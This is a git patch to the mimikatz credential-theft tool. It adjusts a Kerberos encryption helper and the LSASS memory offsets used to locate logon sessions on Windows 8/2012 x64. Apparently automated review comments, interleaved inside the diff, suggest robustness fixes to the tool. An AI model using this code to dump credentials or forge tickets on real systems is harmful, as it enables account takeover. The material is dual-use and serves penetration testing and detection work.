From 029d72bdaf6814afe7cb1a1719956ae211fc755c Mon Sep 17 00:00:00 2001
From: Benjamin DELPY
Date: Fri, 23 May 2014 19:22:32 +0200
Subject: [PATCH] Fixed LogonSessionListCount for 8.0/2012 x64 (Yeah, Joe tested on this platform ;))
---
 mimikatz/modules/kerberos/kuhl_m_kerberos.c | 8 ++++----
 mimikatz/modules/kerberos/kuhl_m_kerberos.h | 2 +-
 mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h | 2 +-
 mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c | 1 -
 mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c | 5 ++++-
 5 files changed, 10 insertions(+), 8 deletions(-)
diff --git a/mimikatz/modules/kerberos/kuhl_m_kerberos.c b/mimikatz/modules/kerberos/kuhl_m_kerberos.c
index bcb655f..81c4a23 100644
--- a/mimikatz/modules/kerberos/kuhl_m_kerberos.c
+++ b/mimikatz/modules/kerberos/kuhl_m_kerberos.c
@@ -336,12 +336,12 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
 return STATUS_SUCCESS;
 }
-NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID * output, DWORD * outputSize, BOOL encrypt)
+NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt)
 {
 NTSTATUS status;
 PKERB_ECRYPT pCSystem;
 PVOID pContext;
- DWORD bufferSize;
+ //DWORD bufferSize;
 status = CDLocateCSystem(eType, &pCSystem);
 if(NT_SUCCESS(status))
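Review bot: `+ //DWORD bufferSize;` leaves commented-out code in the declaration block of kuhl_m_kerberos_encrypt; since the size is now stored directly in `*outputSize` (next hunk), the declaration should be deleted rather than commented out. The function body continues past this hunk.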
@@ -349,8 +349,8 @@ NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD
 status = pCSystem->Initialize(key, keySize, keyUsage, &pContext);
 if(NT_SUCCESS(status))
 {
- bufferSize = encrypt ? (dataSize + pCSystem->Size) : (dataSize /*- pCSystem->Size*/);
- if(*output = LocalAlloc(LPTR, bufferSize))
+ *outputSize = encrypt ? (dataSize + pCSystem->Size) : dataSize;
+ if(*output = LocalAlloc(LPTR, *outputSize))
 {
 status = encrypt ? pCSystem->Encrypt(pContext, data, dataSize, *output, outputSize) : pCSystem->Decrypt(pContext, data, dataSize, *output, outputSize);
 if(!NT_SUCCESS(status))
diff --git a/mimikatz/modules/kerberos/kuhl_m_kerberos.h b/mimikatz/modules/kerberos/kuhl_m_kerberos.h
index 381f57c..d8ee1b3 100644
--- a/mimikatz/modules/kerberos/kuhl_m_kerberos.h
+++ b/mimikatz/modules/kerberos/kuhl_m_kerberos.h
@@ -35,4 +35,4 @@ NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[]);
 wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext);
 struct _DIRTY_ASN1_SEQUENCE_EASY * kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, PISID sid, LPCBYTE krbtgt, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups);
-NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID * output, DWORD * outputSize, BOOL encrypt);
\ No newline at end of file
+NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt);
\ No newline at end of file
diff --git a/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h b/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h
index cf6f4a4..d0c247b 100644
--- a/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h
+++ b/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h
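Review bot: `*outputSize` is now written before LocalAlloc is known to have succeeded, so on allocation failure the caller is handed `*output == NULL` together with a non-zero `*outputSize`; the failure branch lies outside the hunk, and clearing the size there (`*outputSize = 0;`) keeps the two out-parameters consistent. Storing the size up front does look necessary, since the same pointer is then passed to Encrypt/Decrypt, presumably as an in/out buffer length, so the fix itself is sound. `dataSize + pCSystem->Size` is an unchecked DWORD addition; a guard that rejects `dataSize > MAXDWORD - pCSystem->Size` before the assignment and takes the existing error path makes the bound explicit, even though the inputs here are the tool's own ticket data. The rewritten condition `if(*output = LocalAlloc(LPTR, *outputSize))` would read less like a typo as `if((*output = LocalAlloc(LPTR, *outputSize)) != NULL)`.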
@@ -34,7 +34,7 @@ typedef struct _USER_SESSION_KEY {
 UCHAR data[16];
 } USER_SESSION_KEY;
-typedef struct _KERB_SID_AND_ATTRIBUTES{
+typedef struct _KERB_SID_AND_ATTRIBUTES {
 PISID Sid;
 DWORD Attributes;
 } KERB_SID_AND_ATTRIBUTES, *PKERB_SID_AND_ATTRIBUTES;
diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
index 0af4933..d56aced 100644
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -314,7 +314,6 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
 if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
 helper++; // yeah, really, I do that =)
-
 securityStruct.hMemory = cLsass.hLsassMem;
 securityStruct.address = LogonSessionListCount;
diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
index df5144f..d6a14c1 100644
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
@@ -14,7 +14,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
 {KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -60}},
 {KULL_M_WIN_BUILD_7, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -59}},
- {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -61}},
+ {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -0}},
 {KULL_M_WIN_MIN_BUILD_BLUE, {sizeof(PTRN_WIN81_LogonSessionList), PTRN_WIN81_LogonSessionList}, {0, NULL}, {-4, -53}},
 };
 #elif defined _M_IX86
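Review bot: The new `{-4, -0}` row for KULL_M_WIN_BUILD_8 is a placeholder: `-0` is simply `0`, and it only becomes a usable offset because kuhl_m_sekurlsa_utils_search (the next hunk) overwrites `LsaSrvReferences[4].Offsets.off1` at run time, so any other reader of the table gets a silently wrong offset. Keeping the pre-KB value as the static default, `{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -61}}, // x64 6.2: off1 is adjusted at run time in kuhl_m_sekurlsa_utils_search`, leaves the table self-consistent and names the coupling. The literal index 4 in the next hunk is tied to this row's position and breaks silently if a row is inserted above it; a named index constant beside the table, or a lookup by the row's build number, would keep the two sides in step by construction.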
@@ -37,6 +37,9 @@ PULONG LogonSessionListCount = NULL;
 BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib)
 {
 PVOID *pLogonSessionListCount = (cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_2K3) ? NULL : ((PVOID *) &LogonSessionListCount);
+#ifdef _M_X64
+ LsaSrvReferences[4].Offsets.off1 = (pLib->Informations.TimeDateStamp > 0x53480000) ? -54 : -61; // 6.2 post or pre KB
+#endif
 return kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, LsaSrvReferences, sizeof(LsaSrvReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LogonSessionList, pLogonSessionListCount, NULL);
 }
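Review bot: `pLib->Informations.TimeDateStamp > 0x53480000` repeats the threshold already used in kuhl_m_sekurlsa_enum (kuhl_m_sekurlsa.c hunk above) to separate pre- and post-KB 6.2 builds; one named constant shared by both sites, e.g. `#define KULL_M_WIN_62_LSASRV_KB_TIMESTAMP 0x53480000` (name is a suggestion), keeps the two comparisons from drifting apart. The assignment also mutates the file-scope LsaSrvReferences table on every call, which deserves a comment such as `// x64 6.2 only: patch the static placeholder in LsaSrvReferences, since this offset depends on the library build (TimeDateStamp) rather than on the OS build number`. The trailing `// 6.2 post or pre KB` would help more if it said which value belongs to which case, e.g. `// 6.2 x64: -54 after the KB update, -61 before it`.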